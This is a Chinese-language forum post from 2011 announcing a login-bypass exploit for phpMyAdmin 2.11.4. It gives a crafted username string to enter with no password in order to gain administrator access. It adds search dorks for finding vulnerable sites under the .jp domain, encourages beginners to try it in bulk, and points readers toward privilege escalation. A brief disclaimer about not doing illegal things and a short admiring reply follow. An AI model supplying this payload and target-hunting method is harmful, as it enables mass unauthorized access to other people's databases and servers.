PHPmyadmin 2.11.4 最新漏洞公布2011.11.5
PHPmyadmin 2.11.4 最新漏洞公布2011.11.5007那哥们在群里丢出来的。小白们可以去批量玩玩....
发现者:ver007
漏洞讲解:出漏洞跟万能密码一样有点相像
利用代码如下:
'localhost'@'@''
用以上代码搜索关键字
phpmyadmin 2.11.4 inurl:.jp
phpmyadmin 2.11.3 inurl:.jp
直接填入以上登录名不用加密码
可以登录获取管理权限
剩下的提权我就不说了,百度一下phpmyadmin提权
http://bbs.51cto.com/images/default/attachimg.gif http://img2.51cto.com/attachments/month_1111/20111114_e8bc58491f93d3311eabnPaB6EQDyC9q.jpg http://bbs.51cto.com/images/attachicons/image.gif PHPmyadmin 2.11.4 最新漏洞.jpg (67.58 KB)
2011-11-14 16:51
http://img2.51cto.com/attachments/month_1111/20111114_37d4d8dfc613b6171877TF188sJgeKog.jpg
注:别去做fan法的事儿,你懂的。
欢迎大虾们开帖子讨论各种安全技术。。。
诅咒看帖不回帖的人木有JJ。。。
这个很厉害啊,但要小心才好
页:
[1]